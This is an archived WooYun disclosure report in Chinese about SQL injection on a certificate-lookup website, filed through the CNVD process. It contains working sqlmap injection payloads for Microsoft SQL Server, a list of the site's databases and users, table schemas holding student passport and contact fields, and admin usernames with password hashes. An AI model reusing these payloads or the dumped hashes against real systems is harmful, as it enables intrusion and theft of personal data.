乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
中国证书查询网注入漏洞,泄露大量重要信息。。。。
通过注入漏洞,可以跑出网站大量重要信息,其中包括管理员账号和密码,只不过密码解不出来,无法进行下一步检测。。。。注入漏洞:http://**.**.**.**/online_join.asp?cid=1 多达16个数据库。。。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cid Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) Payload: cid=(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 8709*(SELECT 8709 FROM master..sysdatabases) END)) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cid=1 AND 4384=CONVERT(INT,(CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: cid=-3936 UNION ALL SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) CHAR(82) CHAR(65) CHAR(80) CHAR(78) CHAR(72) CHAR(116) CHAR(82) CHAR(85) CHAR(75) CHAR(78) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58),NULL-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: cid=(SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (7556=7556) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58))---[20:13:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[20:13:49] [INFO] fetching database names[20:13:50] [INFO] the SQL query used returns 16 entriesavailable databases [16]:[*] 360beikao[*] 86690003_201311[*] 86690003_201411[*] 86690003_com[*] baodicanyin[*] beixinyuan[*] cnzscxdata[*] cnzscxdata_2015[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] ShangHui[*] tempdb[*] xueyuancurrent database: 'cnzscxdata'current user: 'cnzscxdata_u'7个用户:[20:15:29] [INFO] the SQL query used returns 7 entries[20:15:29] [INFO] retrieved: "86690003_com"[20:15:30] [INFO] retrieved: "baodicanyin"[20:15:30] [INFO] retrieved: "BUILTIN\\\\Administrators"[20:15:30] [INFO] retrieved: "cnzscxdata_u"[20:15:31] [INFO] retrieved: "sa"[20:15:31] [INFO] retrieved: "shanghui"[20:15:32] [INFO] retrieved: "SUPERNIC-56FF19\\\\SQLDEBUGGER"database management system users [7]:[*] 86690003_com[*] baodicanyin[*] BUILTIN\\Administrators[*] cnzscxdata_u[*] sa[*] shanghui[*] SUPERNIC-56FF19\\SQLDEBUGGER
数据库中含有大量学生的敏感信息。。。。。
Database: cnzscxdata[34 tables]+---------------------------+| dtproperties || icetu_Admin || icetu_Advertisement || icetu_Cert || icetu_CertSample || icetu_City || icetu_College || icetu_Number || icetu_Province || icetu_RecruitStudentsInfo || icetu_UserMessage || icetu_activeText || icetu_adChannal || icetu_join || icetu_manager || icetu_news || icetu_regUser || icetu_renzheng || kk358_Admin || kk358_Agencies || kk358_Application || kk358_ApplicationOrders || kk358_Courses || kk358_Messages || kk358_MigrationClients || kk358_News || kk358_RegisteredCourses || kk358_Schedule || kk358_Schools || kk358_StayHomes || kk358_Students || kk358_Travel || sysconstraints || syssegments |+---------------------------+Database: cnzscxdataTable: icetu_Admin[7 columns]+------------------+---------------+| Column | Type |+------------------+---------------+| CurrentLoginIP | nvarchar || CurrentLoginTime | smalldatetime || Flag | nvarchar || LastLoginIP | nvarchar ||| PassWord | nvarchar || UserName | nvarchar |+------------------+---------------+Database: cnzscxdataTable: kk358_Students[20 columns]+-----------------+---------------+| Column | Type |+-----------------+---------------+| AgentId | int || AreaId | int || AsscNo | nvarchar || BirthDay | smalldatetime || ContactPersonId | int || ContactPhone | nvarchar || CreateDate | smalldatetime || CreateUser | nvarchar || CurrentUser | nvarchar || Email | nvarchar || ExpireDate | smalldatetime || FullName | nvarchar || GraduationDate | nvarchar || id | int || LastUpdateDate | smalldatetime || LastUpdateUser | nvarchar || Mobile | nvarchar || PassportNo | nvarchar || Telephone | nvarchar || VisaType | nvarchar |+-----------------+---------------+Database: cnzscxdataTable: kk358_Admin[12 columns]+------------------+---------------+| Column | Type |+------------------+---------------+| AreaId | nvarchar || BrowseFlag | int || CurrentLoginIP | nvarchar || CurrentLoginTime | smalldatetime || Flag | nvarchar || ID | int || LastLoginIP | nvarchar || LastLoginTime | smalldatetime || Options | nvarchar || PassWord | nvarchar || UserGroup | tinyint || UserName | nvarchar |+------------------+---------------+Database: cnzscxdataTable: kk358_Admin[6 entries]+------------+------------------+-----------+| UserName | PassWord | UserGroup |+------------+------------------+-----------+| accountant | 21e09df36d23bf1c | 3 || admin | 3144d570f6b2bf3b | 0 || newuser | 42b452ccbe28c89e | 0 || OMSyd | a9921913b1d203b0 | 2 || GMSyd | b94e3172b87abc2b | 1 || officer | cbf64331dddd69eb | 4 |+------------+------------------+-----------+
就这样吧。。。
危害等级:中
漏洞Rank:10
确认时间:2015-09-17 15:32
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件 通报
暂无